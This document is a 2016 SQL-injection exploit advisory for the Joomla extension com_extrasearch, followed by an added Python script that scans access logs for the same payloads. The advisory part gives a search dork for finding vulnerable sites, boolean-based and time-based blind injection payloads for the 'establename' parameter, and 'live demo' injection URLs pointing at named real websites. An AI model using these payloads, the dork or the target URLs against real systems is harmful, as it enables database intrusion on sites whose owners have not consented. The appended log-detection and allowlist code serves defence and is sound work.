######################
# Exploit Title : Joomla com_extrasearch SQL injection Vulnerability
# Exploit Author : howucan
# Website : http://howucan.gr
# Dork : inurl:/index.php?option=com_extrasearch establename
# Software link : http://www.joomlaboat.com/extra-search
# Software version : 2.2.8
# video : http://adf.ly/1cmGen
# Tested on: [ Parrot os 3.1 ]
# Date: 2016/07/31
#
######################
# [+] Poc :
######################
# Get Parameter establename Vulnerable To SQLi
# http(s):////index.php?option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=themes(inject here)
# [+] SQLmap Poc :
###############
# Type: boolean-based blind
# Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
# Payload: option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=-5792" OR MAKE_SET(5730=5730,3268) AND "OpLU"="OpLU
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=themes" AND SLEEP(5) AND "bmqB"="bmqB
#
######################
# [+] Live Demo
# http://www.joomlaboat.com/index.php?option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=themes%27
# http://cursosoxford.com/index.php/en/?option=com_extrasearch&view=details&listing_id=6&Itemid=178&establename=calendar%27&returnto=aHR0cDovL2N1cnNvc294Zm9yZC5jb20vaW5kZXgucGhwL2VuLyNhNg==
# http://tuesmeralda.com/en/?option=com_extrasearch&view=details&listing_id=37&Itemid=106&establename=catalog%27&returnto=aHR0cDovL3R1ZXNtZXJhbGRhLmNvbS9lcy9jb2xlY2Npb24tcGxhdGEtZXNtZXJhbGRhI2EzNw==
######################
# Salonika Punk Rock City
# PAOK G4
#######################
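
Added detection example (not part of the original advisory or the extension's code): the check below flags com_extrasearch requests in a web access log whose establename value is not a plain identifier, which covers the quote probe and the time-based payload shown above. The log lines are constructed, and the identifier pattern is an assumption about what legitimate values look like.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: a legitimate establename is a plain identifier such as "themes".
SAFE_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")
# Request field of a common/combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, no real hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Jul/2016:10:00:00 +0000] "GET /index.php?option=com_extrasearch'
    '&view=details&listing_id=15&Itemid=662&establename=themes HTTP/1.1" 200 5120',
    '198.51.100.7 - - [31/Jul/2016:10:01:12 +0000] "GET /index.php?option=com_extrasearch'
    '&view=details&listing_id=15&Itemid=662&establename=themes%27 HTTP/1.1" 500 310',
    '198.51.100.7 - - [31/Jul/2016:10:01:40 +0000] "GET /index.php?option=com_extrasearch'
    '&view=details&listing_id=15&Itemid=662'
    '&establename=themes%22%20AND%20SLEEP(5)%20AND%20%22bmqB%22=%22bmqB HTTP/1.1" 200 5120',
    '192.0.2.33 - - [31/Jul/2016:10:02:05 +0000] "GET /index.php?option=com_content'
    '&view=article&id=3 HTTP/1.1" 200 8841',
]

def suspicious_establename(log_line):
    """Return the decoded establename value if the line is a com_extrasearch
    request whose establename is not a plain identifier, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if "com_extrasearch" not in query.get("option", []):
        return None
    for value in query.get("establename", []):
        if not SAFE_NAME.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_value) for every flagged log line."""
    hits = []
    for line in lines:
        value = suspicious_establename(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} establename={value!r}")
```

The same allowlist pattern, applied server-side before the value reaches a query, rejects both payload types listed in the advisory.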